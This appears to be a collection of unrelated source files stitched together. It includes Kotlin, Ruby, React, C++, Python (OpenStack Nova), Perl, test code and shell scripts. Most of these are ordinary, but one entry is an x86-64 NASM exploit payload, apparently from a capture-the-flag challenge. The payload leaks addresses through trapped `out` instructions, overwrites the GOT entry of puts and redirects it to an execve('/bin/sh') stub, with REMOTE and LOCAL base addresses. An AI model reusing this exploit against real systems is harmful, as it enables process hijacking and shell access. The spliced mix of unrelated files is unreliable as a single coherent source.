     * DataSet's per-attribute average and standard deviation. Attributes
     * with zero standard deviation are left untouched.
     */
    fun zScore() {
        val stdDvtn = dataSet!!.standardDeviation
        val avrg = dataSet!!.average
        for (i in data.indices) {
            if (dataSet!!.isNumerical(i) && stdDvtn[i] != ZERO )
                data[i] = data[i]
                    .subtract(avrg[i])
                    .divide(stdDvtn[i], precision, RoundingMode.HALF_UP)
                    .stripTrailingZeros()
        }
    }

    /**
     * Normalizes this row in place with the decimal-scaling method, moving
     * the decimal point of attribute i left by j[i] digits.
     */
    fun decimalScaling(j: IntArray)
    {
        for (i in data.indices)
            if (dataSet!!.isNumerical(i))
                data[i] = data[i].movePointLeft(j[i]).stripTrailingZeros()
    }

    override fun toString() = "Instance(indice=$indice, clazz=$clazz, values=${data.contentToString()})"
}
|
#!/bin/bash
# Downloads the image at the URL given as $1, generates a description for it
# with lib/index.js, and posts description + image via the `t` CLI
# (presumably the Twitter CLI -- confirm). The temporary file is removed
# afterwards in every case.

# Fixed: quote "$1" to survive word splitting/globbing in URLs.
# -f: fail on HTTP errors instead of saving an error page; -sS: quiet but
# still report errors; -L: follow redirects.
curl -fsSL -o waifu "$1"
DESCRIPTION=$(node lib/index.js "$1")
# $? is the exit status of the command substitution (node), as before.
if [ $? -eq 0 ]; then
    t update "$DESCRIPTION" -f waifu
else
    echo failed
fi
# -f: don't error if the download never produced the file.
rm -f waifu
|
# Copyright (C) 2009-2019 MongoDB Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module BSON

  # Injects behaviour for encoding and decoding regular expression values to
  # and from raw bytes as specified by the BSON spec.
  #
  # @see http://bsonspec.org/#/specification
  #
  # @since 2.0.0
  module Regexp
    include JSON

    # A regular expression is type 0x0B in the BSON spec.
    #
    # @since 2.0.0
    BSON_TYPE = 11.chr.force_encoding(BINARY).freeze

    # Extended value constant.
    #
    # @since 3.2.6
    EXTENDED_VALUE = 'x'.freeze

    # Ignore case constant.
    #
    # @since 3.2.6
    IGNORECASE_VALUE = 'i'.freeze

    # Multiline constant.
    #
    # @since 3.2.6
    MULTILINE_VALUE = 'm'.freeze

    # Newline constant.
    #
    # @since 3.2.6
    NEWLINE_VALUE = 's'.freeze

    # Ruby multiline constant.
    #
    # @since 3.2.6
    #
    # @deprecated Will be removed in 5.0
    RUBY_MULTILINE_VALUE = 'ms'.freeze

    # Get the regexp as JSON hash data.
    #
    # @example Get the regexp as a JSON hash.
    #   regexp.as_json
    #
    # @return [ Hash ] The regexp as a JSON hash.
    #
    # @since 2.0.0
    def as_json(*args)
      { "$regex" => source, "$options" => bson_options }
    end

    # Get the regular expression as encoded BSON.
    #
    # @example Get the regular expression as encoded BSON.
    #   %r{\d+}.to_bson
    #
    # @note From the BSON spec: The first cstring is the regex pattern,
    #   the second is the regex options string. Options are identified
    #   by characters, which must be stored in alphabetical order.
    #   Valid options are 'i' for case insensitive matching,
    #   'm' for multiline matching, 'x' for verbose mode,
    #   'l' to make \w, \W, etc. locale dependent,
    #   's' for dotall mode ('.' matches everything),
    #   and 'u' to make \w, \W, etc. match unicode.
    #
    # @param [ BSON::ByteBuffer ] buffer The byte buffer to append to.
    # @param [ true, false ] validating_keys
    #
    # @return [ BSON::ByteBuffer ] The buffer with the encoded object.
    #
    # @see http://bsonspec.org/#/specification
    #
    # @since 2.0.0
    def to_bson(buffer = ByteBuffer.new, validating_keys = Config.validating_keys?)
      # Only the two cstrings are appended here; the element's type byte and
      # key are written by the enclosing document's serializer.
      buffer.put_cstring(source)
      buffer.put_cstring(bson_options)
    end

    private

    def bson_options
      # Ruby's Regexp always has BSON's equivalent of 'm' on, so always add it
      bson_ignorecase + MULTILINE_VALUE + bson_dotall + bson_extended
    end

    def bson_extended
      # NO_VALUE (an empty placeholder) is defined elsewhere in the library.
      (options & ::Regexp::EXTENDED != 0) ? EXTENDED_VALUE : NO_VALUE
    end

    def bson_ignorecase
      (options & ::Regexp::IGNORECASE != 0) ? IGNORECASE_VALUE : NO_VALUE
    end

    def bson_dotall
      # Ruby Regexp's MULTILINE is equivalent to BSON's dotall value
      (options & ::Regexp::MULTILINE != 0) ? NEWLINE_VALUE : NO_VALUE
    end

    # Represents the raw values for the regular expression.
    #
    # @see https://jira.mongodb.org/browse/RUBY-698
    #
    # @since 3.0.0
    class Raw
      include JSON

      # @return [ String ] pattern The regex pattern.
      attr_reader :pattern

      # @return [ Integer ] options The options.
      attr_reader :options

      # Compile the Regular expression into the native type.
      #
      # @example Compile the regular expression.
      #   raw.compile
      #
      # @return [ ::Regexp ] The compiled regular expression.
      #
      # @since 3.0.0
      def compile
        @compiled ||= ::Regexp.new(pattern, options_to_int)
      end

      # Initialize the new raw regular expression.
      #
      # @example Initialize the raw regexp.
      #   Raw.new(pattern, options)
      #
      # @param [ String ] pattern The regular expression pattern.
      # @param [ String, Integer ] options The options.
      #
      # @note The ability to specify options as an Integer is deprecated.
      #   Please specify options as a String. The ability to pass options as
      #   as Integer will be removed in version 5.0.0.
      #
      # @since 3.0.0
      def initialize(pattern, options = '')
        @pattern = pattern
        @options = options
      end

      # Allow automatic delegation of methods to the Regexp object
      # returned by +compile+.
      #
      # @param [ String] method The name of a method.
      #
      # @since 3.1.0
      def respond_to?(method, include_private = false)
        compile.respond_to?(method, include_private) || super
      end

      # Encode the Raw Regexp object to BSON.
      #
      # @example Get the raw regular expression as encoded BSON.
      #   raw_regexp.to_bson
      #
      # @note From the BSON spec: The first cstring is the regex pattern,
      #   the second is the regex options string. Options are identified
      #   by characters, which must be stored in alphabetical order.
      #   Valid options are 'i' for case insensitive matching,
      #   'm' for multiline matching, 'x' for verbose mode,
      #   'l' to make \w, \W, etc. locale dependent,
      #   's' for dotall mode ('.' matches everything),
      #   and 'u' to make \w, \W, etc. match unicode.
      #
      # @param [ BSON::ByteBuffer ] buffer The byte buffer to append to.
      # @param [ true, false ] validating_keys
      #
      # @return [ BSON::ByteBuffer ] The buffer with the encoded object.
      #
      # @see http://bsonspec.org/#/specification
      #
      # @since 4.2.0
      def to_bson(buffer = ByteBuffer.new, validating_keys = Config.validating_keys?)
        return compile.to_bson(buffer, validating_keys) if options.is_a?(Integer)
        # `source` is not defined on Raw; it resolves through method_missing
        # to the compiled ::Regexp's #source.
        buffer.put_cstring(source)
        buffer.put_cstring(options.chars.sort.join)
      end

      # Get the raw BSON regexp as JSON hash data.
      #
      # @example Get the raw regexp as a JSON hash.
      #   raw_regexp.as_json
      #
      # @return [ Hash ] The raw regexp as a JSON hash.
      #
      # @since 4.2.0
      def as_json(*args)
        as_extended_json(mode: :legacy)
      end

      # Converts this object to a representation directly serializable to
      # Extended JSON (https://github.com/mongodb/specifications/blob/master/source/extended-json.rst).
      #
      # @option opts [ nil | :relaxed | :legacy ] :mode Serialization mode
      #   (default is canonical extended JSON)
      #
      # @return [ Hash ] The extended json representation.
      def as_extended_json(**opts)
        if opts[:mode] == :legacy
          { "$regex" => source, "$options" => options }
        else
          {"$regularExpression" => {'pattern' => source, "options" => options}}
        end
      end

      # Check equality of the raw bson regexp against another.
      #
      # @example Check if the raw bson regexp is equal to the other.
      #   raw_regexp == other
      #
      # @param [ Object ] other The object to check against.
      #
      # @return [ true, false ] If the objects are equal.
      #
      # @since 4.2.0
      def ==(other)
        return false unless other.is_a?(::Regexp::Raw)
        pattern == other.pattern &&
          options == other.options
      end
      alias :eql? :==

      private

      # Delegates any unknown method to the compiled ::Regexp.
      def method_missing(method, *arguments)
        return super unless respond_to?(method)
        compile.send(method, *arguments)
      end

      # Translates a string options value ('i', 'm', 's', 'x' flags) into the
      # equivalent ::Regexp option bits; Integers pass through unchanged.
      def options_to_int
        return options if options.is_a?(Integer)
        opts = 0
        opts |= ::Regexp::IGNORECASE if options.include?(IGNORECASE_VALUE)
        opts |= ::Regexp::MULTILINE if options.include?(NEWLINE_VALUE)
        opts |= ::Regexp::EXTENDED if options.include?(EXTENDED_VALUE)
        opts
      end
    end

    module ClassMethods

      # Deserialize the regular expression from BSON.
      #
      # @param [ ByteBuffer ] buffer The byte buffer.
      #
      # @option opts [ nil | :bson ] :mode Decoding mode to use.
      #
      # @return [ Regexp ] The decoded regular expression.
      #
      # @see http://bsonspec.org/#/specification
      #
      # @since 2.0.0
      def from_bson(buffer, **opts)
        pattern = buffer.get_cstring
        options = buffer.get_cstring
        Raw.new(pattern, options)
      end
    end

    # Register this type when the module is loaded.
    #
    # @since 2.0.0
    Registry.register(BSON_TYPE, ::Regexp)
  end

  # Enrich the core Regexp class with this module.
  #
  # @since 2.0.0
  ::Regexp.send(:include, Regexp)
  ::Regexp.send(:extend, Regexp::ClassMethods)
end
|
; Exploit payload (NASM, x86-64). NOTE(review): the repeated `mov edi, <port>`
; followed by `out dx, al` suggests the target (presumably an emulated device /
; hypervisor) traps `out` and reads the "port" from edi and the argument from
; rax -- confirm against the target's trap handler. Ports appear to act as
; commands: 0x62 ~ read/leak, 0x63 ~ set length, 0x64 ~ write/trigger.
BITS 64
%define marker 0x1583
%define honco 0x1508
mov eax, honco
mov edi, 0x64
out dx, al
; Gets to the base address
;REMOTE
;mov rbx, 0xfffffffffff72000
;LOCAL
mov rbx, 0xfffffffffff6a000
; Leak addess of vmem
mov rax, rbx
add rax, 0x2319
mov edi, 0x64
out dx, al
; Leak offset of execve call
lea rax, [rel execve]
mov edi, 0x62
out dx, al
; Now overwrite GOT address of puts
; (0x2130 is presumably the GOT offset of puts in the target -- confirm)
mov rax, rbx
add rax, 0x2130
mov rsi, 8
mov edi, 0x63
out dx, al
lea eax, [rel flag]
mov edi, 0x64
out dx, al
; DEBUG
mov edi, 0x62
out dx, al
; Now issue a write_line, which will actually call execve(/bin/sh)
mov edi, 0x64
out dx, al
; DEBUG
mov edi, 0x62
out dx, al
;loop:
;    mov rax, rbx
;    mov edi, 0x62
;    out dx, al
;
;;    mov rax, rbx
;;    mov esi, 1
;;    mov edi, 0x63
;;    out dx, al
;;
;;    mov edi, 0x62
;;    out dx, al
;
;    mov rax, rbx
;    mov edi, 0x64
;    out dx, al
;
;    sub rbx, 0x8
;    jmp loop
; Exit
mov edx, 0xc
int 0x80
hlt
; execve("/bin/sh", {NULL-ish}, ...) via direct syscall 59; becomes the
; puts replacement after the GOT overwrite above.
execve:
lea rdi, [rel binsh]
push 0
mov rsi, rsp
mov rdx, rsp
mov eax, 59
syscall
; Data: command string sent first, and the shell path for execve.
flag:
db 'flag', 0
binsh:
db '/bin/sh', 0
|
# my-portfolio
Repo con mi página web, donde pretendo aplicar todo lo aprendido hasta el momento.
|
import React from 'react';
import {
injectIntl,
} from 'react-intl';
import PropTypes from 'prop-types';
import { SelectionFilter } from '@folio/stripes-acq-components';
import { useCloseReasonOptions } from '../hooks';
import { closingReasonsShape } from '../shapes';
const ClosingReasonFilter = ({ closingReasons, intl: { formatMessage }, ...rest }) => {
const translatedReasonsOptions = useCloseReasonOptions(formatMessage, closingReasons);
return (
<SelectionFilter
{...rest}
options={translatedReasonsOptions}
/>
);
};
ClosingReasonFilter.propTypes = {
closingReasons: closingReasonsShape,
intl: PropTypes.object.isRequired,
};
export default injectIntl(ClosingReasonFilter);
|
#pragma once

namespace silk
{
namespace params
{

// Abstract interface for a single named, typed, enable-able parameter.
class IParam
{
public:
    // Discriminated union of the value types a parameter can hold.
    // FIX: the original declared this as a *data member* of misspelled
    // type `boo`; it is used below as a type, so it must be an alias.
    typedef boost::variant<bool, int32_t, float, std::string> Value;

    // Virtual destructor so implementations can be deleted through the
    // interface.  FIX: members were implicitly private in the original,
    // making the interface unusable by clients.
    virtual ~IParam() = default;

    virtual q::Path const& get_path() const = 0;
    virtual std::string const& get_ui_prefix() const = 0;
    virtual std::string const& get_ui_suffix() const = 0;
    virtual std::string const& get_ui_name() const = 0;

    virtual void set_enabled(bool enabled) = 0;
    virtual bool is_enabled() const = 0;

    virtual Value get_value() const = 0;
    virtual void set_value(Value const& value) = 0;
    virtual bool is_value_compatible(Value const& value) const = 0;
    virtual bool is_value_valid(Value const& value) const = 0;
};  // FIX: class definition requires a trailing semicolon.

} // namespace params
} // namespace silk
|
1. flow
2. classes
2a. class relationships
-user is welcomed
-user selects a number
-user receives a numbered list of albums
-user makes selection
-user receives info on album and artist
-user is asked if they want to start over
-user exits
Classes
-event
-CLI
-Scraper
what is an album?
an album has a name
an album has an artist
an album has info
|
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
from webob import exc
from nova import compute
from nova import exception
from nova import policy
from nova.i18n import _
from nova.api.openstack import wsgi
from nova.api.openstack import extensions
authorize = extensions.extension_authorizer('compute', 'eayun-userdata')
class EayunUserDataController(wsgi.Controller):
    """EayunStack userdata controller.

    Exposes read (show) and update operations for an instance's
    user_data attribute via the eayun-userdata extension resource.
    """

    def __init__(self, ext_mgr=None):
        super(EayunUserDataController, self).__init__()
        self.compute_api = compute.API()
        self.ext_mgr = ext_mgr

    def _validate_user_data(self, user_data):
        """Check if the user_data is base64-encoded properly.

        Empty/None user_data is accepted unchanged; anything else must
        decode cleanly or HTTPBadRequest is raised.
        """
        if not user_data:
            return
        try:
            base64.b64decode(user_data)
        except (TypeError, ValueError):
            # b64decode raises TypeError (py2) or binascii.Error, a
            # ValueError subclass (py3).  The original bare `except:`
            # also swallowed KeyboardInterrupt/SystemExit.
            expl = _('Userdata content cannot be decoded')
            raise exc.HTTPBadRequest(explanation=expl)

    def _get_userdata(self, instance):
        """Return the API response dict for the instance's user_data."""
        return {'user_data': instance.get("user_data", None)}

    def _is_valid_body(self, body, entity_name):
        """Return True if body is a dict containing entity_name."""
        if not (body and entity_name in body):
            return False
        return isinstance(body, dict)

    def show(self, req, id):
        """Return userdata by server id."""
        context = req.environ['nova.context']
        authorize(context)
        try:
            instance = self.compute_api.get(context, id,
                                            want_objects=True)
            req.cache_db_instance(instance)
        except exception.NotFound:
            msg = _("Instance could not be found")
            raise exc.HTTPNotFound(explanation=msg)
        return self._get_userdata(instance)

    def update(self, req, id, body):
        """Update userdata by server id."""
        if not self._is_valid_body(body, 'user_data'):
            raise exc.HTTPUnprocessableEntity()
        context = req.environ['nova.context']
        authorize(context)
        user_data = body['user_data']
        self._validate_user_data(user_data)
        update_dict = {'user_data': user_data}
        try:
            instance = self.compute_api.get(context, id,
                                            want_objects=True)
        except exception.NotFound:
            msg = _("Instance could not be found")
            raise exc.HTTPNotFound(explanation=msg)
        req.cache_db_instance(instance)
        # Per-instance policy check in addition to the extension-level
        # authorize() above.
        policy.enforce(context, 'compute_extension:eayun-userdata:update',
                       instance)
        instance.update(update_dict)
        instance.save()
        return self._get_userdata(instance)
class Eayun_user_data(extensions.ExtensionDescriptor):
    """Add userdata extension for v2 API."""

    name = "EayunUserData"
    alias = "eayun-userdata"
    namespace = ("www.eayun.cn")
    updated = "2017-01-10T00:00:00Z"

    def get_resources(self):
        # Expose a single 'eayun-userdata' resource backed by the
        # controller above, sharing this descriptor's extension manager.
        controller = EayunUserDataController(self.ext_mgr)
        resource = extensions.ResourceExtension('eayun-userdata',
                                                controller)
        return [resource]
|
/**
* This file is part of Ark Cpp Crypto.
*
* (c) Ark Ecosystem <info@ark.io>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
**/
#ifndef SERIALIZER_H
#define SERIALIZER_H

#include "transactions/transaction.h"

namespace Ark {
namespace Crypto {
namespace Transactions {

// Serializes an ARK Transaction into its string wire representation.
class Serializer {
 public:
  // Copies the transaction to serialize.
  // NOTE(review): single-argument constructor is not `explicit`, so a
  // Transaction converts implicitly to Serializer; confirm intended.
  Serializer(const Transaction& transaction);

  // Produce the serialized form of the stored transaction.
  std::string serialize();

 private:
  // Each helper appends its portion of the payload to `bytes`; the
  // type-specific helpers are selected by the transaction's type.
  void serializeVendorField(std::vector<uint8_t>& bytes);
  void serializeType(std::vector<uint8_t>& bytes);
  void serializeTransfer(std::vector<uint8_t>& bytes);
  void serializeSecondSignatureRegistration(std::vector<uint8_t>& bytes);
  void serializeDelegateRegistration(std::vector<uint8_t>& bytes);
  void serializeVote(std::vector<uint8_t>& bytes);
  void serializeMultiSignatureRegistration(std::vector<uint8_t>& bytes);
  void serializeSignatures(std::vector<uint8_t>& bytes);

  Transaction _transaction;
};

}  // namespace Transactions
}  // namespace Crypto
}  // namespace Ark

#endif
|
/*
* Copyright 2019 Kroto+ Contributors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.github.marcoferrer.krotoplus.generators
import com.github.marcoferrer.krotoplus.coroutines.launchProducerJob
import com.github.marcoferrer.krotoplus.coroutines.withCoroutineContext
import io.grpc.examples.helloworld.*
import io.grpc.testing.GrpcServerRule
import io.mockk.coEvery
import io.mockk.every
import io.mockk.slot
import io.mockk.spyk
import kotlinx.coroutines.*
import kotlinx.coroutines.channels.Channel
import kotlinx.coroutines.channels.ReceiveChannel
import kotlinx.coroutines.channels.SendChannel
import kotlinx.coroutines.channels.consumeEach
import kotlinx.coroutines.channels.toList
import org.junit.Ignore
import org.junit.Rule
import org.junit.Test
import test.message.TestMessages
import test.message.__MalformedService__CoroutineGrpc
import kotlin.coroutines.CoroutineContext
import kotlin.test.assertEquals
import kotlin.test.assertNull
import kotlin.test.BeforeTest
@UseExperimental(ObsoleteCoroutinesApi::class)
/**
 * Integration tests for the coroutine gRPC stubs produced by the
 * generator: verifies descriptors, unary/streaming calls and the
 * method-signature convenience overloads against an in-process server.
 */
class GrpcCoroutinesGeneratorTests {

    // In-process gRPC server executing on the caller's thread.
    @[Rule JvmField]
    var grpcServerRule = GrpcServerRule().directExecutor()

    val expectedMessage = "result"

    @BeforeTest
    fun setupService(){
        // Register a coroutine-based Greeter implementation covering all
        // four call shapes (unary, client-, server- and bidi-streaming).
        grpcServerRule.serviceRegistry.addService(object : GreeterCoroutineGrpc.GreeterImplBase(){

            override val initialContext: CoroutineContext
                get() = Dispatchers.Default

            override suspend fun sayHello(request: HelloRequest): HelloReply {
                return HelloReply { message = expectedMessage }
            }

            override suspend fun sayHelloClientStreaming(requestChannel: ReceiveChannel<HelloRequest>): HelloReply {
                // Echo all received names joined by '|'.
                return HelloReply {
                    message = requestChannel.toList().joinToString(separator = "|"){ it.name }
                }
            }

            override suspend fun sayHelloServerStreaming(
                request: HelloRequest,
                responseChannel: SendChannel<HelloReply>
            ) {
                repeat(3){
                    responseChannel.send { message = request.name + "-$it" }
                }
            }

            override suspend fun sayHelloStreaming(
                requestChannel: ReceiveChannel<HelloRequest>,
                responseChannel: SendChannel<HelloReply>
            ) {
                // Three responses per request.
                requestChannel.consumeEach { request ->
                    repeat(3) {
                        responseChannel.send { message = request.name }
                    }
                }
            }
        })
    }

    @Test
    fun `Service name prop is generated`(){
        assertEquals(GreeterGrpc.SERVICE_NAME, GreeterCoroutineGrpc.SERVICE_NAME)
    }

    @Test
    fun `Method descriptors are generated`(){
        assertEquals(GreeterGrpc.getSayHelloMethod(), GreeterCoroutineGrpc.sayHelloMethod)
        assertEquals(GreeterGrpc.getSayHelloServerStreamingMethod(), GreeterCoroutineGrpc.sayHelloServerStreamingMethod)
        assertEquals(GreeterGrpc.getSayHelloClientStreamingMethod(), GreeterCoroutineGrpc.sayHelloClientStreamingMethod)
        assertEquals(GreeterGrpc.getSayHelloStreamingMethod(), GreeterCoroutineGrpc.sayHelloStreamingMethod)
    }

    @Test
    fun `Unary rpc methods are generated`() = runBlocking {
        val stub = GreeterCoroutineGrpc.newStub(grpcServerRule.channel)

        // Plain request, default-instance overload, and builder overload.
        assertEquals(expectedMessage,stub.sayHello(HelloRequest.getDefaultInstance()).message)
        assertEquals(expectedMessage,stub.sayHello().message)
        assertEquals(expectedMessage,stub.sayHello { name = "test" }.message)
    }

    @Test
    fun `Server streaming methods with method signature are generated`() = runBlocking {
        val expectedField = "anything"
        val nestedMessage = TestMessages.L1Message1.L2Nested1.newBuilder()
            .setField("testing")
            .build()

        val expectedRequest = TestMessages.L1Message1.newBuilder()
            .setField(expectedField)
            .setNestedMessage(nestedMessage)
            .build()

        // Spy the stub so the request assembled from the flattened
        // signature arguments can be captured and compared.
        val stub = spyk(__MalformedService__CoroutineGrpc.newStub(grpcServerRule.channel))
        val requestSlot = slot<TestMessages.L1Message1>()
        coEvery { stub.sayHelloServerStreaming(capture(requestSlot)) } returns Channel()

        stub.sayHelloServerStreaming(expectedField, nestedMessage).cancel()
        assertEquals(expectedRequest,requestSlot.captured)
    }

    @Test
    fun `Unary rpc methods with method signature are generated`() = runBlocking {
        val expectedField = "anything"
        val nestedMessage = TestMessages.L1Message1.L2Nested1.newBuilder()
            .setField("testing")
            .build()

        val expectedRequest = TestMessages.L1Message1.newBuilder()
            .setField(expectedField)
            .setNestedMessage(nestedMessage)
            .build()

        val stub = spyk(__MalformedService__CoroutineGrpc.newStub(grpcServerRule.channel))
        val requestSlot = slot<TestMessages.L1Message1>()
        coEvery { stub.sayHello(capture(requestSlot)) } returns TestMessages.L1Message2.getDefaultInstance()

        stub.sayHello(expectedField, nestedMessage)
        assertEquals(expectedRequest,requestSlot.captured)
    }

    @Test
    fun `Client streaming rpc methods are generated`() = runBlocking {
        val stub = GreeterCoroutineGrpc.newStub(grpcServerRule.channel)
            .withCoroutineContext()

        val (requestChannel, response) = stub.sayHelloClientStreaming()

        launchProducerJob(requestChannel){
            repeat(3){
                send { name = "name $it" }
            }
        }

        assertEquals("name 0|name 1|name 2",response.await().message)
    }

    @ExperimentalCoroutinesApi
    @ObsoleteCoroutinesApi
    @Test
    fun `Server streaming rpc methods are generated`() = runBlocking {
        val stub = GreeterCoroutineGrpc.newStub(grpcServerRule.channel)
            .withCoroutineContext()

        // Default Value Ext
        val response1 = stub.sayHelloServerStreaming()
        repeat(3){
            assertEquals("-$it",response1.receive().message)
        }
        assertNull(response1.receiveOrNull())
        assert(response1.isClosedForReceive)

        // Single Message Parameter Ext
        val response2 = stub.sayHelloServerStreaming(HelloRequest { name = "with-arg" })
        repeat(3){
            assertEquals("with-arg-$it",response2.receive().message)
        }
        assertNull(response2.receiveOrNull())
        assert(response2.isClosedForReceive)

        // Message Builder Ext
        val response3 = stub.sayHelloServerStreaming { name = "with-block" }
        repeat(3){
            assertEquals("with-block-$it",response3.receive().message)
        }
        assertNull(response3.receiveOrNull())
        assert(response3.isClosedForReceive)
    }

    @Test
    fun `Bidi streaming rpc methods are generated`() {
        runBlocking {
            val stub = GreeterCoroutineGrpc.newStub(grpcServerRule.channel)
                .withCoroutineContext()

            val (requestChannel, responseChannel) = stub.sayHelloStreaming()

            launch(Dispatchers.Default) {
                repeat(3) {
                    requestChannel.send { name = "name $it" }
                }
                requestChannel.close()
            }

            // 3 requests x 3 responses each = 9 messages.
            val results = responseChannel.toList()
            assertEquals(9, results.size)

            val expected = "name 0|name 0|name 0" +
                    "|name 1|name 1|name 1" +
                    "|name 2|name 2|name 2"

            assertEquals(
                expected,
                results.joinToString(separator = "|") { it.message }
            )
        }
    }
}
|
#!/bin/bash

# Push the LCFS docker plugin to Docker Hub.
# Required environment: DOCKER_HUB_REPO, DOCKER_HUB_LCFS_PLUGIN,
# DOCKER_HUB_LCFS_TAG.

SUDO=sudo

# Fail fast when any required variable is unset or empty.
# (Replaces three copy-pasted checks; `exit -1` was also non-portable,
# POSIX exit status must be 0-255.)
for var in DOCKER_HUB_REPO DOCKER_HUB_LCFS_PLUGIN DOCKER_HUB_LCFS_TAG; do
    if [ -z "${!var}" ]; then
        echo "Please set ${var} env variable." >&2
        exit 1
    fi
done

# Push the plugin to docker hub
$SUDO docker plugin push "$DOCKER_HUB_REPO/$DOCKER_HUB_LCFS_PLUGIN:$DOCKER_HUB_LCFS_TAG"
|
package Lingua::Stem::Snowball::Lt;
use strict;
use warnings;
use 5.006002;
use Carp;
use Exporter;
use vars qw(
$VERSION
@ISA
@EXPORT_OK
$AUTOLOAD
%EXPORT_TAGS
$stemmifier
%instance_vars
);
$VERSION = '0.03';
@ISA = qw( Exporter DynaLoader );
%EXPORT_TAGS = ( 'all' => [qw( stem )] );
@EXPORT_OK = ( @{ $EXPORT_TAGS{'all'} } );
require DynaLoader;
__PACKAGE__->bootstrap($VERSION);
# Ensure that C symbols are exported so that other shared libraries (e.g.
# KinoSearch) can use them. See Dynaloader docs.
sub dl_load_flags {0x01}
# A shared home for the actual struct sb_stemmer C modules.
$stemmifier = Lingua::Stem::Snowball::Lt::Stemmifier->new;
%instance_vars = (
lang => 'lt',
encoding => 'UTF-8',
locale => undef,
stemmer_id => -1,
strip_apostrophes => 0,
);
# Construct a stemmer object.  Caller-supplied key/value pairs are
# merged over the package defaults in %instance_vars.
sub new {
    my $class = shift;
    my $self = bless { %instance_vars, @_ }, ref($class) || $class;

    # Get an sb_stemmer (XS call; resolves the C-level stemmer handle).
    $self->_derive_stemmer;

    return $self;
}
# Lowercase and stem the supplied word(s).  Usable both as a method and
# as a plain function; see POD below for the full calling conventions.
sub stem {
    my ( $self, $words, $locale, $is_stemmed );

    # Support lots of DWIMmery: method call (first arg is an object)
    # vs. functional call (construct a throwaway stemmer).
    # NOTE: $locale is accepted but unused -- kept only for
    # backwards compatibility (documented in the POD).
    if ( UNIVERSAL::isa( $_[0], 'HASH' ) ) {
        ( $self, $words, $is_stemmed ) = @_;
    }
    else {
        ( $words, $locale, $is_stemmed ) = @_;
        $self = __PACKAGE__->new( );
    }

    # Bail if there's no input.
    return undef unless ( ref($words) or length($words) );

    # Duplicate the input array and transform it into an array of stems.
    $words = ref($words) ? $words : [$words];
    my @stems = map {lc} @$words;
    $self->stem_in_place( \@stems );

    # Determine whether any stemming took place, if requested
    # ($is_stemmed must be a scalar ref; set to 1 on any change).
    if ( ref($is_stemmed) ) {
        $$is_stemmed = 0;
        if ( $self->{stemmer_id} == -1 ) {
            $$is_stemmed = 1;
        }
        else {
            for ( 0 .. $#stems ) {
                next if $stems[$_] eq $words->[$_];
                $$is_stemmed = 1;
                last;
            }
        }
    }

    return wantarray ? @stems : $stems[0];
}
1;
__END__
=head1 NAME
Lingua::Stem::Snowball::Lt - Perl interface to Snowball stemmer for the Lithuanian language.
=head1 SYNOPSIS
my @words = qw( niekada myliu );
# OO interface:
my $stemmer = Lingua::Stem::Snowball::Lt->new( );
$stemmer->stem_in_place( \@words ); # qw( niekad myl )
# Functional interface:
my @stems = stem( \@words );
=head1 DESCRIPTION
Stemming reduces related words to a common root form -- for instance, "horse",
"horses", and "horsing" all become "hors". Most commonly, stemming is
deployed as part of a search application, allowing searches for a given term
to match documents which contain other forms of that term.
This module is very similar to L<Lingua::Stem> -- however, Lingua::Stem is
pure Perl, while Lingua::Stem::Snowball::Lt is an XS module which provides a Perl
interface to the C version of the Lithuanian stemmer based on Snowball.
(L<http://snowball.tartarus.org>).
=head1 METHODS / FUNCTIONS
=head2 new
my $stemmer = Lingua::Stem::Snowball::Lt->new( );
die $@ if $@;
Create a Lingua::Stem::Snowball::Lt object.
=head2 stem
@stemmed = $stemmer->stem( WORDS, [IS_STEMMED] );
@stemmed = stem( WORDS, [LOCALE], [IS_STEMMED] );
Return lowercased and stemmed output. WORDS may be either an array of words
or a single scalar word.
In a scalar context, stem() returns the first item in the array of stems:
$stem = $stemmer->stem($word);
$first_stem = $stemmer->stem(\@words); # probably wrong
LOCALE has no effect; it is only there as a placeholder for backwards
compatibility (see Changes). IS_STEMMED must be a reference to a scalar; if
it is supplied, it will be set to 1 if the output differs from the input in
some way, 0 otherwise.
=head2 stem_in_place
$stemmer->stem_in_place(\@words);
This is a high-performance, streamlined version of stem() (in fact, stem()
calls stem_in_place() internally). It has no return value, instead modifying
each item in an existing array of words. The words must already be in lower
case.
=head1 AUTHORS
Lingua::Stem::Snowball was originally developed to provide
access to stemming algorithms for the OpenFTS (full text search engine)
project (L<http://openfts.sourceforge.net>), by Oleg Bartunov, E<lt>oleg at
sai dot msu dot suE<gt> and Teodor Sigaev, E<lt>teodor at stack dot netE<gt>.
Lingua::Stem::Snowball is currently maintained by Marvin Humphrey
E<lt>marvin at rectangular dot comE<gt>. Previously maintained by Fabien
Potencier E<lt>fabpot at cpan dot orgE<gt>.
Lithuanian language adaptation (Lingua::Stem::Snowball::Lt) was done by
Linas Valiukas. Lithuanian stemmer for Snowball was created by Z. Medelis,
M. Petkevicius and T. Krilavicius.
=head1 COPYRIGHT AND LICENSE
Perl bindings copyright 2004-2008 by Marvin Humphrey, Fabien Potencier, Oleg
Bartunov and Teodor Sigaev.
Lithuanian language adaptation (Lingua::Stem::Snowball::Lt) copyright 2013
by Linas Valiukas.
This software may be freely copied and distributed under the same
terms and conditions as Perl.
Snowball files and stemmers are covered by the BSD license.
Lithuanian stemmer (by Z. Medelis, M. Petkevicius, T. Krilavicius) is covered
by the Academic Free License (AFL).
=head1 SEE ALSO
